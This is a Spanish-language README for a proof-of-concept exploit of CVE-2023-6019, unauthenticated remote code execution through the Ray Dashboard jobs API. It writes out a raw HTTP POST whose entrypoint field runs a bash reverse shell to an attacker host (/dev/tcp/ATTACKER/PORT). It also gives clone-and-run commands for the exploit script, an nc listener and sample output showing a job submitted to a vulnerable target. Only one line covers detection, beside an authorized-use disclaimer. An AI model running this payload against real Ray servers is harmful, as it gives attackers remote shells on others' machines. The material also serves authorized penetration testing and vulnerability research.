
PoC exploit para CVE-2023-6019 - Ejecución Remota de Código a través de la API de Trabajos del Panel de Ray no autenticada.
PoC exploit para CVE-2023-6019 — Ejecución remota de código a través de la API de trabajos del Ray Dashboard sin autenticación.
Creado por oguiii
Anyscale Ray es un framework de código abierto para cargas de trabajo distribuidas de ML/IA. Las versiones anteriores a 2.6.4 exponen una API de envío de trabajos a través del Ray Dashboard (puerto predeterminado 8265) sin ninguna autenticación, permitiendo a un atacante no autenticado enviar trabajos arbitrarios y lograr Ejecución Remota de Código en el host.
El endpoint /api/jobs/ acepta un payload JSON con un campo entrypoint que se ejecuta como un comando de shell por el proceso trabajador de Ray - sin necesidad de credenciales.
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json
{
"entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
"runtime_env": {},
"job_id": null,
"metadata": {}
}
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>
# Iniciar listener
nc -lvnp 4444
# Ejecutar exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019
[*] Target : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...
[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc
[>] Make sure your listener is ready:
nc -lvnp 4444
Busque solicitudes POST inesperadas a /api/jobs/ en el puerto 8265 en sus registros HTTP o tráfico de red.
Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y fines educativos.
El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.
Siempre obtenga la autorización escrita adecuada antes de realizar pruebas.
| Flag | Descripción | Por defecto |
|---|
-t | IP o nombre de host objetivo | requerido |
-p | Puerto del Ray Dashboard | 8265 |
-l | IP del atacante (shell reversa) | requerido |
-lp | Puerto del atacante (shell reversa) | requerido |